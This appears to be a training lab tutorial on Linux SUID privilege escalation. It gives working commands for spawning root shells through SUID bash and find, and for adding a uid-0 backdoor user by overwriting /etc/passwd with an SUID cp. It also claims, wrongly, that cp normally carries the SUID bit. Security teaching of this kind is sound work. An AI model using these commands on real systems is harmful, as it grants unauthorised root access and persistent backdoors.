In this lab, you will learn about the SUID (Set user ID upon execution) permission and how to leverage it for privilege escalation on Linux systems. The goal is to gain root access by exploiting SUID binaries with various techniques, including using bash, find, cp, and mv commands.
In this step, you will understand the concept of SUID permission and its implications.
Typically, when a program is executed on Linux, it runs with the permissions of the current user. However, some programs, like cp, require elevated privileges to perform certain operations, such as copying files to restricted directories. To allow regular users to execute such programs with elevated privileges, the SUID permission can be set on the executable file.
SUID stands for "Set user ID upon execution." When a file has the SUID permission set, it executes with the permissions of its owner, regardless of the user executing it. For example, the cp command is owned by the root user and has the SUID bit set, allowing any user to execute it with root privileges.
To check the SUID permission on the cp command and save the output to a file, run the following command:
ls -l /usr/bin/cp > /home/labex/project/suid_cp.txtView the contents of the suid_cp.txt file using the following command:
cat /home/labex/project/suid_cp.txtExpected output:
-rwsr-xr-x 1 root root 141832 Feb 8 2024 /usr/bin/cpYou should see an s in the permission bits, indicating the SUID permission.
While SUID can be useful for allowing regular users to run specific privileged commands, it can also be exploited if the SUID binary provides functionality for executing system commands or modifying files.
In this step, you will learn how to exploit the bash command with SUID permission for privilege escalation.
First, open a terminal and navigate to the /home/labex/project directory.
cd /home/labex/projectCheck the permissions of the bash command.
ls -l /bin/bashExpected output:
-rwsr-xr-x 1 root root 1037520 Feb 5 2022 /bin/bashIf the bash command has the SUID bit set, you can leverage it to execute system commands with root privileges using the following command:
bash -pUsing whoami, you can verify that you have a root shell.
whoamiExpected output:
rootNow, you can create a file named root.txt in the /root directory and verify the contents of the file.
touch /root/root.txtYou should see the root.txt file in the /root directory.
In this step, you will learn how to exploit the find command with SUID permission for privilege escalation.
After last step, you should have a root shell. For this step, you need to logout from the root shell and login again as the labex user by exit command or opening a new terminal.
First, navigate to the /home/labex/project directory:
cd /home/labex/projectCheck the permissions of the find command:
ls -l /usr/bin/findIf the find command has the SUID bit set, you can leverage it to execute system commands with root privileges.
The syntax for executing a command with find is:
find <file> -exec <command> \;Here, <file> can be any file. Let's create a file called test:
touch testNow, you can execute commands using find:
find test -exec whoami \;This will execute the whoami command with root privileges. However, this method is not convenient for interactive commands like ssh or su.
To get a more convenient root shell, you can execute the /bin/bash command:
find test -exec /bin/bash -p \;Note: The -p flag is necessary to preserve the effective user ID (EUID) and prevent it from being reset to the real user ID (RUID).
You should now have a root shell. Create a file named root.txt in the /root directory and verify the contents of the file:
touch /root/root.txtYou should see the root.txt file in the /root directory.
In this step, you will learn how to exploit the cp and mv commands with SUID permission for privilege escalation by modifying the /etc/passwd or /etc/shadow file.
After last step, you should have a root shell. For this step, you need to logout from the root shell and login again as the labex user by exit command or opening a new terminal.
First, navigate to the /home/labex/project directory:
cd /home/labex/projectCheck the permissions of the cp command:
ls -l /bin/cpIf the cp command has the SUID bit set, you can proceed with the exploitation.
Copy the contents of /etc/passwd to a file in your home directory:
cat /etc/passwd > /home/labex/project/passwdCreate a new user entry with the following details:
Username: hacked
Password: pass123
Insert the following line at the end of the /home/labex/project/passwd file:
echo 'hacked:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash' >> /home/labex/project/passwdNow, use the cp command with SUID permission to overwrite the /etc/passwd file:
cp /home/labex/project/passwd /etc/passwdAfter overwriting the file, you can switch to the hacked user with the password pass123 using the su command:
su hackedSince the hacked user has a user ID (uid) of 0, you will have root privileges.
The exploitation method for the mv command is similar to cp. You can try it yourself.
In this step, you will learn how to find SUID binaries on a system that can potentially be exploited for privilege escalation.
You can use the following commands to list all executable files with the SUID bit set:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;Navigate to the /home/labex/project directory to perform the following steps.
cd /home/labex/projectChoose any of the commands to list the SUID binaries on the system and analyze the output.
find / -user root -perm -4000 -print 2>/dev/null > check_results.txtCheck the contents of the check_results.txt file to view the list of SUID binaries on the system.
cat check_results.txtHowever, the output may contain many files that cannot be exploited for privilege escalation, requiring manual analysis.
In this lab, you learned about the SUID permission and how to leverage various SUID binaries, such as bash, find, cp, and mv, for privilege escalation on Linux systems. You gained hands-on experience in exploiting these binaries to obtain root access, which is a crucial skill in the field of cybersecurity. The lab provided a practical scenario and guided you through the steps to understand and apply the techniques effectively.